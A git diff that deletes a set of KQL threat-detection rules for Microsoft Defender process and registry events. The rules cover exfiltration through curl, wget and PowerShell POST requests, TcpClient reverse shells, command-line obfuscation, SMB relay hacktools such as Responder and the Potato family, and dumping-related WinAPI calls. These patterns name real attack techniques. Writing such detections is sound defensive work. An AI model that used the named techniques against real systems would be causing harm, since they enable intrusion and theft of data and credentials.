diff --git a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql b/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
deleted file mode 100644
index 33ee0fa7..00000000
--- a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects the use of various CLI utilities exfiltrating data via web requests
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "net view" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "sc query" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Dosfuscation_Activity.kql b/Execution/Potential_Dosfuscation_Activity.kql
deleted file mode 100644
index d84c9691..00000000
--- a/Execution/Potential_Dosfuscation_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/15
-// Level: medium
-// Description: Detects possible payload obfuscation via the commandline
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql b/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
deleted file mode 100644
index 901cfc87..00000000
--- a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020/10/15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Downgrade_Attack.kql b/Execution/Potential_PowerShell_Downgrade_Attack.kql
deleted file mode 100644
index 1a70acae..00000000
--- a/Execution/Potential_PowerShell_Downgrade_Attack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harish Segar (rule)
-// Date: 2020/03/20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
deleted file mode 100644
index b0d3f76d..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
deleted file mode 100644
index 94151df4..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/Execution/Potential_Powershell_ReverseShell_Connection.kql b/Execution/Potential_Powershell_ReverseShell_Connection.kql
deleted file mode 100644
index 62c86967..00000000
--- a/Execution/Potential_Powershell_ReverseShell_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 1bbe2f01..00000000
--- a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 82b19961..00000000
--- a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_RDP_Session_Hijacking_Activity.kql b/Execution/Potential_RDP_Session_Hijacking_Activity.kql
deleted file mode 100644
index b2e0b52b..00000000
--- a/Execution/Potential_RDP_Session_Hijacking_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @juju4
-// Date: 2022/12/27
-// Level: medium
-// Description: Detects potential RDP Session Hijacking activity on Windows systems
-// Tags: attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and ProcessIntegrityLevel =~ "SYSTEM"
\ No newline at end of file
diff --git a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Renamed_Rundll32_Execution.kql b/Execution/Potential_Renamed_Rundll32_Execution.kql
deleted file mode 100644
index 195901b1..00000000
--- a/Execution/Potential_Renamed_Rundll32_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql b/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
deleted file mode 100644
index d7b1df2c..00000000
--- a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: critical
-// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql b/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
deleted file mode 100644
index b329e821..00000000
--- a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: medium
-// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
-
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe" or FolderPath startswith "") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")
\ No newline at end of file
diff --git a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a96027da..00000000
--- a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql b/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
deleted file mode 100644
index 0fec1416..00000000
--- a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296
-// Date: 2019/02/13
-// Level: high
-// Description: Detects registry keys related to Ursnif malware.
-// Tags: attack.execution, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\Software\\AppDataLow\\Software\\Microsoft") and (not((RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Internet Explorer" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\RepService" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\IME" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Edge")))
\ No newline at end of file
diff --git a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql b/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
deleted file mode 100644
index e0957f2c..00000000
--- a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis @Karneades
-// Date: 2019/04/03
-// Level: medium
-// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
-// Tags: attack.execution, attack.t1047, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql b/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
deleted file mode 100644
index ea6c5d19..00000000
--- a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/06
-// Level: high
-// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
-// Tags: attack.execution, attack.t1106
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
deleted file mode 100644
index 25ef6289..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql
deleted file mode 100644
index 4dc7fab5..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
